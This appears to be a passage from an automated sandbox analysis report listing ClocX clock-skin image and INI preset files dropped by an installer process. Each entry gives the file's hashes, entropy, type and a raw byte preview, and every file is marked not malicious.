Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..]QIDATx.b...?.(... ..F.`d....M.#......Z...(.fw..&b[.J$(..A4....R..x.....7..l...7x...\f`.\|.....RJ.(..8u..1.EQ`..@....R...1..s..T.".#..C`).:...g&..z.e.>........z~.....7.....6.[h..$.;.3.....o.8...;.!...F.....,$4.vFc.7...G(.N.^-A......{w..m....TU.0........Ia....f&Z.......DRz.NK7]X../1#....G.y..2.........h...q.....7....d..R...Q.V.. ..."..M..C.....9c...~....,..H!..4....v=;.8_.DG<.&.ue..@.CQX....-<.......^..Q..B...;l...{...:.\..8.4.$..;tn.R...M.%4j..v../,.4Fl.%g..J.Y.._....q.V...`...oc.9.....S.Z.....A,.p.'.z.O....""Z.._.4...#....L..f.F./.N..^^>->^.Sv.....k..=..@.....?L.?\|.........&..pM...X.E.?Pu..w&D../0........%4...._...F!AA36VV._.~....l,,_......%p....7??../.?..hm\|o........,..........&N..\:..`.Zr....Ei..X.[.=.{.7...z....4.<@.? ....(....$.....\|bgL'...L_..z[UK!....\ 5.x..W)ey.A.....A8....DR...@........m&..{.CH#...."...].K.!8;......f../..\|k.....S..!

C:\Program Files (x86)\ClocX\Presets\BlackBallRoman.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18261
Entropy (8bit):	7.972349901067941
Encrypted:	false
SSDEEP:	384:+RTsz18O1aVoTRG/gB3OySclWba32Z58aPY5I2YelngpOILTc/61ENvt:sm1TootG0Oy/WbqlFI0y1EBt
MD5:	732674A58E6E96725158AB71D39D1AF1
SHA1:	19E9FD5080FD624A0BA53C23BE8939166431FE55
SHA-256:	2B885590F9C5CD14ACCF5066E444EDEB4DD5A678A278401EBE60422E93EEFD18
SHA-512:	1C32055BD5ABCEC2E898D782E65DC2C31E289B874D964292974E94671173BAB2900D58CAAC1E4C58234381E680B03582E53FE1CDCCC24839D575BBC0A200691A
Malicious:	false
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME..........U.. .IDATx..}yxT...}..$....6....-...V...~U....Oj...~V.....V\J.].l.Z.....P..M1,...Y&.Lf_..Y~.L.7..dA._.u.+...3....r?......M.6.Z[[.....].vM.w.......T..Q.i...S.$.a.....f.....f.1I..>........:4s...3f.h.2e..s.F...x..>s.9.\|....Y..... ....t:...f.0,...)..{EQd.....v......g.;..<..S..w.?._.W.^.a.3.[wZoo.a8.@.......E..,#..B.$.\|>.....r!.J.j.".L.j.BQ.D"...a(...0`..dY....'...M.`.X..f. =y.....\...3.\w..g7.G.>.c...O>.....;'...$.M..i !.$.......?......c.=.....f..Z...r.Z..d2lRu]...PU..@..`.....o.6o..;v ..BUU...Y.... ."$Ib......}..._\|...v.iM...#p\y.K........o..ba..."f....ttt.....D.........w..A..fC*....(....lA..(......@__..N'.0.........c.v....c.m....}.X,.d2.8q.kg.y.o.~..5.1.<.__?{....hH.d..n..N0n..F.W^1z{{.EQ..0.t:md.Y....8..S.I.....+.H$btww..h....4.......#......F[[....ktvv....0.............4:::.C......4:;;...n.......0.....+V.3g.4...$1....~?....O.......

C:\Program Files (x86)\ClocX\Presets\BlackClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 117 x 119 x 8, 1 compression, image size 6966, resolution 2898 x 2898 px/m, 256 important colors, cbSize 8044, bits offset 1078
Category:	dropped
Size (bytes):	8044
Entropy (8bit):	6.168405619029834
Encrypted:	false
SSDEEP:	192:xSaertTTPSCkul+KvKPq+guw3NVvY5WlHBHnaXO1Kuk5hVR:xeF6CLlraRw3Na56p5rk5hv
MD5:	99997471274B4A052F0BBDF11EF4D52B
SHA1:	C66163666A712ADED3981FC62F6545EE26B37FF8
SHA-256:	6EFA274E645CCE1483C678FD22DF195413037A95681788DD758C5BB99AA92418
SHA-512:	BD2B2CA3161FE9234E3BAAD6ADBA7BA15F025D6031804FBD7E80695B2B210786CBAD178DE9946A20B585D2D306D44E8089FFC83F52B7703E41E0093D555CB8BF
Malicious:	false
Preview:	BMl.......6...(...u...w...........6...R...R..................................................................................................................................................................................................................................................................................................................................................................................................................................................... ... ..."... ...$.. #.. ".. %..!&..#(..$(.!"". "$."$%.$%&. %).%%(.')+.#(..%)-.)).),.,-.--..%+0.&,0.-0.(-2.)/3..3...1.,/4.+03./01.04.-26./48.112.124.246.456.16:.468.17<.789.68:.38<.79<.59>.6;?.89:.:;<.9<>.<<=.6;@.8=B.=>@.:?D.>@B.;@E.<AE.?EI.@AB.ACE.CDD.DFG.AFI.FFH.EGJ.GGJ.AGL.EHJ.GHJ.FJK.CHM.DIM.IIJ.JJL.ILN.KLN.LNN.FLQ.HMQ.LNP.KPS.OQS.KPT.MRV.OTY.PQQ.QQT.PRT.RST.STU.TUV.QVZ.UVX.RW\.VXZ.SX\.TY].XYZ.YZ\.Y\].\]].W\`.Y]`.]^`.Y_d.Z`c.^`a.Z`d.\be._dg._di.`ab.bcd.cef.dde.`fi.dgk.fhk.ejn.hij.ikm.jlm.mnn.gkp.flp.hmq.mn

C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	4.621169578246485
Encrypted:	false
SSDEEP:	24:BE/Drm5b7OmTORXFB01rfukpWdGm8bCi51Pgi:B2H0XCFK9MdGmQ71P3
MD5:	C01ED0B8CF60FB8904628B963D903FCD
SHA1:	80E751986DF1BD6272F172E7EC84CF7A6BD00DD9
SHA-256:	7F10E7820353E7422FA95F9523FC4A43DACEE60806B025F37FD733A7DC6598FB
SHA-512:	A818305CB3623CB4A23F35BA8E84ACBA9F46AA51EAB01791444A99D76507CB222752B3F92528F7E9282678C94D4F32E26CDCDC4671FA9A07D52713817DFC30B8
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFF5 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourColor=0x501A1A ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x501A1A ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....;CenterX=60 ;center point's X (default image_width / 2)..;CenterY=60 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	28114
Entropy (8bit):	7.96802714586052
Encrypted:	false
SSDEEP:	384:5sCbXvMMC03YbV0tj3tx398ZUGY22JbWwlrFijLr+ZBmef/6/xRppPy8/b7zwkxF:/fMx03Oa+KtijLr+Hf/6JJ7zhxNJn+I
MD5:	674CF0106048DFE1BA8F9AFBC3840B48
SHA1:	7CB8AF5DB17DA0A779DE76CC96F4181F741B20EC
SHA-256:	03D0B14986DD3E58B69C15979712F323713EB11CCB095D9137A29C5A169199B2
SHA-512:	5F0B396E53070F471724487AC051C92F1732341741F917F840A070B38EF925122740E1DEB24F8807219718D1F6B51FCF1D8DFD2E38DC29542E1EE5EC9A770D5D
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..mHIDATx.b...?.(... .X...8...._...U..2..)2......73......(3..33.?F&... ........?&.S/........w...,..................Q... ....".....NK.#x.Ob..r.[.Q..s....i............... ..X.Z........B+S._2.AX....z..&..J.&q......c....Z. ...#p......].....@M..4..Atv.g.r'.8!.$.......o:j$D...D...Yv.5......i...lb..D,.z...I..e...,.Bzf.b....2...X...s.d..N......$.. ...E...E.[a.)...5.P..?O.....n4...Z.Va.s/..]...m.r.cG._[...e.)..x.....~..04../.U...xm.n...".x.......w3..Tu.....`..n....\R... :=.\|...E...........K.]..HDDC.g..Sd.M....... 0....I........vE.b..0Q>.T..rg.do=.......l$}....6'........s.=J.....^c.>F..`...t...h.ku:......f..kC.dm...L.Q..#Z..0[...A....h...DP...l"..b..l...........'...C..V...3C..JH...HZU.S0..K7+..-&..Fd.x..G...?.t....>'Iv?..O......E.....$a..;.9s..E.`.....Dw...u.Yc.........>&~...p>l.;.\|2.n61..2......W..O.+...0...\.4mQ.%.88uv......G.\|.g.I.A.]

C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	4.829360623424793
Encrypted:	false
SSDEEP:	24:BEarGXz5lrUBR6TO5fq10X7kpFg4SGIo8Ji4h3NPeibQ0Wd9iBxLuQI:BhqFlQfq1I4SGJmDPBQJTiBxLvI
MD5:	5ACC6F230EF671CD047E46010FFB5782
SHA1:	552172F52383E1C286E8B4C9D373165F511FEDA0
SHA-256:	420E912411E4CAC71F88F0485AD13D9AB40E513979C8C2E820B0BA70A1C9A843
SHA-512:	85D4388F35B93B0E82E4BB5BFFB56DA0A968EAAADC43B009A46F1F7FF03DE1CDA5BCCEDA0550424A86073F7F5DF49F36698E264DA9834BEB12139FD6A0877B32
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF4FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0x00BBFF ;color of hour hand..HourLength=37 ;length of hour hand..HourLap=-7 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x00BBFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=-7 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=53 ;length of second hand..SecondLap=-49 ;overlap of second hand..SecondWidth=7 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2)

C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	25218
Entropy (8bit):	7.984811192664038
Encrypted:	false
SSDEEP:	768:86rfzS40W3RuiRp5F8IdXo0t0WyfrovfU+TnTC:8aG4PRlpUjWMMTC
MD5:	3DBECAC206657C42196EB6258B85F7A3
SHA1:	F496AF89CAD84D2C09EA0121BC3BD5C5690A09EC
SHA-256:	589112537079C34208B56E728B61FFFECC514D898D37E45A4039A1EBBE1E0261
SHA-512:	BA3388F7B35BA75FE93872AEE939CFD03DE554B2477B48AF61A553DEBFF5BABBEED35887FF4EA89E33AA22208AE242DDFA6EA52AAF91A486CAA49E61604FB47E
Malicious:	false
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME....."0.4.M.. .IDATx..w.$gu..9o.........D2..0.`.8-.W......6..k..8.l/.AKt..".,.....!@....G..hF.o.TUo..Q.}....e.X.<.t..].u........yG.......r......~..7^....i.=..K>tL...m.e1......V..df..V.e...e.....V...9......!..z.I.O:.;.}..n)....s../..}_.G.x.c....>................=.P..id..7.h3...RA4..r..{.VJ..$:.....c.E..=;.g......;.`...f.....>..3...+....~.%.........n...../.......~..w?....o;.(%...^........T$.#...H?T.T.W..t..F+...Hq...~.TC.J....Hw..=......M.\|..}..ocO{...c./}.Y._.>.3.v.........,...+.>.}...g}.......p....g..{..F%mp=..F........[....w...&....cpp..}...%...3."\|.+_e.c..{71.i.E..E..J.&...E.t....{.\......w...?{.3.r...........p{..?............VQ......?@......c$.@7.......ZN=..r....@[C.V.V.+&..#.H.!..zCl..".E......w........o....H.)..u).ePTH....z.hm...........w_........e..\|......>w..Q..FQ..Kb.Iff)....w.?...Y<>e.......n..kn........e.x...B[...@...@....[Y\..0*...

C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.815875038770773
Encrypted:	false
SSDEEP:	24:BEarGXz5lrUBR6TO5P10X7kpFgIGIo8Jim03NPeibQ0Wd9iBxLuQI:BhqFlQP1IIGJoYPBQJTiBxLvI
MD5:	D7BC067BEB09EE29E2FF239B39DBC1FB
SHA1:	26B5B966EE8872A2CB2FD038A8D9448826E77AAB
SHA-256:	3796CF0105972A785F485135ED1429B778EC9A3549A24EAA2796035F1D84E9D8
SHA-512:	83D283768A574AEAE44D1A7506CB0C006CE1A5EC15425805D2883C8B7F499EA270F56E3673192681F31E97A4252239FFF75CCB42A3898D2259D152C379068098
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF4FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0x00BBFF ;color of hour hand..HourLength=37 ;length of hour hand..HourLap=5 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x00BBFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=7 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=58 ;length of second hand..SecondLap=9 ;overlap of second hand..SecondWidth=2 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	26827
Entropy (8bit):	7.983277849645144
Encrypted:	false
SSDEEP:	384:+lAnQBTH+Yw2dXkWG+Tmd3mEw1p02I4Hl8bgFvJqdxtej9NgSBlhN7Qdl/2KnGgt:hQBr+YbFDG+TCvWrDFkdxto3HYiDaK+
MD5:	AD4C8EF01B22B7220BB0691E9C392705
SHA1:	B0A6835473DB5B3AAF5699450631BFF5A4204272
SHA-256:	15DD5FA2E9718DC6386E4B4620C1C1F173CE375604FD2D3D9C961F418051BB84
SHA-512:	0176E6F72D928DE575097BBF867B5AF17A0C0C649444D95C83470DC41CEB0B3BD30B1934AF2E661DCCC3D073EE0507F378E75C5798064A313C0A7A9D0F238577
Malicious:	false
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME.....!%..ge.. .IDATx..y.dUy..y.....s.. 3.(rQ..c.\1..F.bL.jb..u.&j. .&.q..%.... ...2t....t7..>CM{Xk..........:...P{........_.q.G>9.....}..v.m.Y.Ht.)...o..<..U>.&.>...skc...&.j..{...k...6.8o.8a..;v.....O<..-.........y.s...x.....e.+...N~..<......t.{....a{rX........0(.....t..{..C.K.&....E....'.8..o.;g.\x.%.W.z..g0...;.W..........g<...6.....]s.eW\..k~...m...I7..7.{<.......X.......AJ")1.........^{.M.r...1%...#E.?..j5...9G.f.....~....7.....'..[~.cN<.g<.........?....,.z.:...\..o\|......H.1..].v...w8.4....[Q...&.>....c..b....U<..o.7...W..;;m..1......W^.5.....i.ZC..C.....`a\|.Q<I.y..T.QJ.y.../{.s.\|.O..s....m....?}.7_.....{..<...k......-:.i.......{...S.a+[\|.....!...0.hj..<."b.$4C...YC..t..$.....w..;...6.n.;....f.........$I...:.4.L`t..+^../...W}........M....'.t.%?...s._).nN(...8yVp....[.;....l.v/.S;......{..$'.{0?..9.b.e.. -....,1D..P.>!..y.Aa..,.

C:\Program Files (x86)\ClocX\Presets\BlueBallStd.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1412
Entropy (8bit):	4.835640392621879
Encrypted:	false
SSDEEP:	24:BEarGXz5lrUBR6TO5fq1rf7kpFg4SGIo8Gio403NPeibQ0Wd9iBxLuQI:BhqFlQfqeI4SGJ/4YPBQJTiBxLvI
MD5:	BB688C71A92147A2F5F7C60E9BFD6D4D
SHA1:	802183CBAF47321F3A9144F81C36AE4D8545D158
SHA-256:	610FB3556B3E858A233766FA9AF50057D41F6DBCBB15AC998A1DE733DE2F471B
SHA-512:	5D890BB00D5433141135AE6C2EA8764830BD500185DBDDBA064744BEFC8CDA027CF82B0B3EC22F5DCA9A3B46C6B16D529D60E24664324C9646D918E89E670ED7
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF4FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0x00BBFF ;color of hour hand..HourLength=37 ;length of hour hand..HourLap=-7 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00BBFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=-7 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x00553FFF ;color of second hand..SecondLength=58 ;length of second hand..SecondLap=-27 ;overlap of second hand..SecondWidth=2 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width /

C:\Program Files (x86)\ClocX\Presets\BlueBallStd.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	28187
Entropy (8bit):	7.986090269080051
Encrypted:	false
SSDEEP:	768:MtXV8nMgM3Da9p/tp3bH73l8vAPt9k73YpH1:wV8VMalb7l8YPtS7oH1
MD5:	52B3B390690B8CC3D7E432F7AD26069E
SHA1:	2A777EDC8D78796291722EC5AD91FD036224DAAC
SHA-256:	BCDE729100D23631E527E126AC820E00B894D5CA0E2B1D11DFE13E2DA2045FFC
SHA-512:	01F670587E3E63D6CCD55B6007F76CD1265D2DF055759CB24E6EDA958E790D556A545054591E4BF3EF92FBB54320EF7CDC6E02E4ED1271B8054CFFC2A691A44E
Malicious:	false
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME......-..... .IDATx..w.eey......n.9s.03.. "..P.FCD....hPy....F..$...6.(...J...@..g.f...9e....c.}......_.o..>{..k.......Y#..>>.....{.a?....~......<~..~....+....H....j.vq..i..n.djC..9.._{.]q....l_~..>t.......}...~..S^>..v....I.y.s.}.......r......}..v.. ..\|l%..C?.......7...-%..L..Sq.4cl<J<._.m#[';\...E...@.@k.c.>..{.8.w<..'..............r.!?...r.]/\.s....x..G!DM......sf'...<^r..1.......N;.u..{mBr...E..z..6.E..f..(.ML..vG.G~..?...wa.\|^o....~.!?{.._..'.t....).]~.5..s.?..U...5....hr.A..0.u+v....y..>.V......9l....l.p.]..._............$.....#p"\.._.h.^<..#..-!i.".t@......%.GH.....5J.>..L.}.._z../8..'..Y+.'.~.....w_..\q..]./(\...lf..h.vg....xD..=.9.....~...p........u......L...9.A`.....a...!I2.<..+W..W....{...G..+2.zHA..C.K7.(..}h.S[2.................o....+>....u.Mw.15.1Q.tR\|V...H.......u..+B6l.D{\|+..~.{Wo"1#<...s.>..w...9...T.G.s..6...@?M.4&.I..V...L..

C:\Program Files (x86)\ClocX\Presets\BlueSphere.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 123 x 123 x 24, resolution 2834 x 2834 px/m, cbSize 45812, bits offset 54
Category:	dropped
Size (bytes):	45812
Entropy (8bit):	6.813368700176925
Encrypted:	false
SSDEEP:	768:4JNtQgkxvPaaWTDWWzXSFzhVORp+8jYCzPlT/536x4:IgPaakXoLOdP55j
MD5:	D0F718A4EC8C75AF41446108FC6DADFD
SHA1:	4267134842903E2967A93896FD48A8CF92EA2A71
SHA-256:	3B78EEF71580D0D884FC53773A304A22C9C3AC007BC1F28AE182B7B153394713
SHA-512:	83098834C891F90FDA0D463F91E15CE6D4110379C53B994668E703F687E73247162CCF862BB284006EEE4393500DC978ED0AEA5BC395141F90481D0095EBA819
Malicious:	false
Preview:	BM........6...(...{...{........................................................................................................................................................................................zzzooodddZZZRRRLLLJJJIIIGGGGGGGGGGGGGGGHHHKKKKKKNNNUUU]]]gggrrr.........................................................................................................................................................................................................................................................................................................rrr^^^MMMGGGCCCFFFKKKTTT]]]hhhsss}}}..................}}}ssshhh\\\SSSLLLEEECCCFFFPPP```uuu..............................................................................................................................................................................................................................................................................~~~aaaLLL>>>AAAMMMaaa{{{.................................................

C:\Program Files (x86)\ClocX\Presets\BlueSphere.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	25942
Entropy (8bit):	7.955440909764544
Encrypted:	false
SSDEEP:	384:5gAXluiJgvL09fKPHmTCrKnehZk/Bl/a6dPipbz2J/ivEIs8fHF30X1OuaUol9:VlIvL09fKPGl/rbjcVmX1ZaH3
MD5:	E8B800502663E1DC178C8C7F20E4910B
SHA1:	67D4438F1114F2D66DE8082C06CE873E1B0977BC
SHA-256:	FC214D8533A48A7E6ACB73EA847484B4BA9D9591196612A63A803F71DFD1E5BA
SHA-512:	FAC04010538C6CC18993E2809937BE95719F54E208D9C21AB09AB1B511D0202D613FA443E0E34E29123D6C3C54FFCCC30156BAABBE13AF258BFDD93F1AC5CE39
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..d.IDATx.b...?.(... .....444.6n..\|..a._.2..:..?..R....`........ 6._..j.}.\|..E.;w.0yyy..p.. .^.0....;..;pzDBB..9..#........ ......LL.8...?.....q.7g.....3.[....!....4.....3..{.:.................H.aaa.....$..@%.@...............`......d....@...............e.=..... .}...?.vKKK3>}..?;;;#...2...@.>..s..y...l..P....[[[QKKKY`.V.F...hW.........p.17...@.......M........o....w.....s.X...&......,)......!555.---.>!...L..........]Bq.................0w..s......0.K..@#..(.....>..S`....x.l'.x....W..~...g.~BV...........=(..@....P^^.d...Pq........pY`d...w}`.LEMMM.(...,."..y...P.@.....!%./@\|....w......./^\.6"..K-..`mm.x...A....4(..........?..V.Z.vPtt4./_.xyyuLMMm.9.HEE..(%..! ......A...Q.H......?...6..f...N..R.l.R.x....:u..}.N...-nn..@6............9(..@.......L....jU...r>{.L.............@9.....D.............`... .A4.- w@K..@....@.`......@.\[.~..#G.l.

C:\Program Files (x86)\ClocX\Presets\BlueSphere2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	23821
Entropy (8bit):	7.947198931425243
Encrypted:	false
SSDEEP:	384:5jIsgmpetEnrsFb0gxMo2FHnRvS1VicSzk+U3Qa8FNvB7SrSDlE8LpwyTWEtJwJB:9IQpeMIMokvS1gxz83nq57YL80EtJwTr
MD5:	DAEB5B8E238848F28D9CB967DC211D2E
SHA1:	6672CACB53247FE0FDB4F68452B19A462BA2555D
SHA-256:	163836A57326CD517C89098265E5DCB0CF689C55A169E5B0B576565560951F70
SHA-512:	CEBF576DCCCA84314837AC80C3E89E68AC86E26DF51D31E3228A229D055E6EB6840842A3F1CB9D2B0A59794312A9FC3FA8B28DB6EE05A159CCEF51E46B05C85A
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..\.IDATx.b...?.(... ..F.`d...b....0a.#......6#.0........a.U.}}}.`.N.8.....Fx...0.w.!**..p.....U... ..J...A,..,.Z.."l....oM.fS..cXv.X..../.`......Cr.$.Hj.Gk..9.1..e;.`G....J)7.i.}.R.c.5...1(.9..'.R.r..{'....+.0......!...........N.._KK...I.....F..0r.xxx....D;::.988.Z..X..y... @a......_..=.?..g z.u.....<}...??..O.>}.&..""".......=...C.......).....D....I.))).s..;.T.KJJ..).....5uuu]..>..211.qh..vFd.c..?.6...,E@..7`x=..+.?..u...../...............4.K..W.^1L.<yP.0@.... ##...@YYY....G.....W.......3...6.be ..F:(....%V.~D.'1.f.&20F.......U.._.>.&....;.L..O.>}..../.5,]..)::zP.%..h.%...dP........;NLL.QGGG......(..6..@.....(...p.......+.......5 a........../^......g...q.....\.s..W."...&`..?0...@...A..@9.......a9..............,.......04.......`d0.".K..F.3@..0.. ......V....dx..A<z...e...V.g.o.~.f^uu5............4(......g........."....FFFN@9kUUU%`.."..

C:\Program Files (x86)\ClocX\Presets\Blue_sphere.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 121 x 121 x 24, resolution 2834 x 2834 px/m, cbSize 44100, bits offset 54
Category:	dropped
Size (bytes):	44100
Entropy (8bit):	6.3032945741088335
Encrypted:	false
SSDEEP:	768:5UgVAiVbt4DDDPywwDu5QQWdkMAlCy+eE8sN7qX3sUcQN:5vhMPad+loeE8rHzZN
MD5:	E7AA8136A3AB665606CF7C759A90B44D
SHA1:	8679DF46FF5F6A5AD64EF2C3942CFD3A6C0D6B6E
SHA-256:	038EDAC0FA25B8299B05657ACE4541DBF1363598D1992BA09003625751B58710
SHA-512:	BF23C2C51D744972CEFA56F6A464E84FD55BD4511DA1FC8EE336DAD7B233F8E09955A0F018B04F8F5E7AEFE60BA70CEFEC167BF68A0FB1B1ACB0FD1FC6C2027C
Malicious:	false
Preview:	BMD.......6...(...y...y....................................................................................................................................................................................................}}}xxxrrrlllkkkkkkkkklllqqqwwwzzz......................................................................................................................................................................................................................................................................................................................yyyhhhUUUJJJCCC>>>;;;:::???AAAEEEHHHKKKJJJFFFEEEAAA===<<<>>>AAAFFFRRReeewww.....................................................................................................................................................................................................................................................................................yyy]]]LLLBBB???HHHWWWgggwww................................................nnn\\\KKK@@

C:\Program Files (x86)\ClocX\Presets\BubbleClock.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	4.621730241023766
Encrypted:	false
SSDEEP:	24:BEsrm5b7OmTORXFB01rfukpWdGm8bCi51Pgi:BH0XCFK9MdGmQ71P3
MD5:	801B92A1950ED3E5A8CB847FA3AF0F23
SHA1:	50A53B61711EEB3CC200E1B11FF8408DB37ECF2A
SHA-256:	67B31CF35186FFFB4CD13AE825EAF0C71599DDAF2EED5EEC8D791701B7118B73
SHA-512:	A2DECA99EFF12867EEDC7F2CE12700F17F2A5E6F226BB614F1958A6E1CCB1307A2E2D4652C61609D55FD0FBA0518908713B823EC61FBA96E6BAF66FC5786B428
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF2FF ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourColor=0x501A1A ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x501A1A ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....;CenterX=60 ;center point's X (default image_width / 2)..;CenterY=60 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\BubbleClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	26311
Entropy (8bit):	7.939197037416011
Encrypted:	false
SSDEEP:	768:xYBlu8IJvxWn5wpAdeR2CsBTw2ybm4LSUJ0sl95O:xIu8IJvxWnO+g8NyfEC95O
MD5:	94575E1B2268EBACFB4349EF05174F80
SHA1:	D7B7F21875C9FDAE5364804E3B4DA77B9D0BE128
SHA-256:	F37F0EE1842F9CEFCFFE4B291C8C247C7A4871252E551150677A86E1575C943C
SHA-512:	01E50869D088D15954E79AE3CCB4C5EDC84F292405AD79AAB4318B0ED6BE18B009D2DCCC33234FBBA88635EFB883EB8DE7E6A07ACE6202767DD231926A515D6C
Malicious:	false
